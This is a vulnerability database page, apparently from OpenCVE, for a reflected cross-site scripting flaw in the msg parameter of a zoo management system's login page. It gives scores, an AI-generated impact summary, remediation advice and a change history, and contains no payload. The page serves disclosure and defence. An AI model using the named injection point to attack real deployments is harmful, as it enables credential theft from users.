Description
A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
Published: 2026-04-01
Score: 6.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting
Action: Apply Patch
AI Analysis

Impact

The Zoo Management System version 1.0 contains a reflected cross‑site scripting flaw in its login page. An attacker can embed malicious JavaScript into the msg query parameter, which the application echoes back without proper encoding or sanitization. When an unsuspecting user visits the crafted URL, the script executes in their browser, enabling the attacker to steal credentials, deface the interface, or perform other client‑side attacks. This weakness corresponds to CWE‑79, a classic input validation error that compromises confidentiality and integrity on the client side.

Affected Systems

The vulnerability is limited to SourceCodester Zoo Management System version 1.0. No other vendors or product variants are reported to be affected.

Risk and Exploitability

The base score of 6.1 indicates a moderate severity, while the EPSS score is below 1 %, suggesting a relatively low probability of widespread exploitation. However, the flaw can be triggered simply by visiting a malicious link without requiring authentication or elevation of privileges, making it attractive to attackers who can distribute spam or phishing campaigns. The lack of an in‑vendor patch at the time of discovery means unpatched systems remain vulnerable until an update is released.

Generated by OpenCVE AI on April 7, 2026 at 21:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the vendor’s patch for Zoo Management System v1.0 once it becomes available
  • Ensure the msg parameter is properly HTML‑escaped or removed from user‑visible output
  • Implement a Content Security Policy that blocks inline script execution
  • Validate or filter input on the server side to reject potentially dangerous characters in the msg parameter
  • Monitor web server logs for repeated access attempts with unusual msg values
  • If the msg parameter is not essential, remove it from the login URL to eliminate the attack surface

Generated by OpenCVE AI on April 7, 2026 at 21:05 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 20:15:00 +0000

Type Values Removed Values Added
Title Reflected XSS in SourceCodester Zoo Management System Login

Tue, 07 Apr 2026 15:15:00 +0000

Type Values Removed Values Added
First Time appeared Pushpam02
Pushpam02 zoo Management System
CPEs cpe:2.3:a:pushpam02:zoo_management_system:1.0:*:*:*:*:*:*:*
Vendors & Products Pushpam02
Pushpam02 zoo Management System

Fri, 03 Apr 2026 10:15:00 +0000

Type Values Removed Values Added
First Time appeared Sourcecodester
Sourcecodester zoo Management System
Vendors & Products Sourcecodester
Sourcecodester zoo Management System

Fri, 03 Apr 2026 06:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 02 Apr 2026 20:30:00 +0000

Type Values Removed Values Added
Title Reflected XSS in SourceCodester Zoo Management System Login
Weaknesses CWE-79

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Zoo Management System v1.0. The vulnerability is located in the login page, specifically within the msg parameter. The application reflects the content of the msg parameter back to the user without proper HTML encoding or sanitization. This allows remote attackers to inject arbitrary web script or HTML via a crafted URL.
References
Metrics cvssV3_1

{'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Pushpam02 Zoo Management System
Sourcecodester Zoo Management System
cve-icon MITRE

Status: PUBLISHED

Assigner: mitre

Published:

Updated: 2026-04-01T15:04:04.957Z

Reserved: 2026-03-04T00:00:00.000Z

Link: CVE-2026-30526

cve-icon Vulnrichment

Updated: 2026-04-01T15:02:11.629Z

cve-icon NVD

Status : Analyzed

Published: 2026-04-01T15:22:59.277

Modified: 2026-04-07T12:05:46.750

Link: CVE-2026-30526

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-08T19:59:59Z

Weaknesses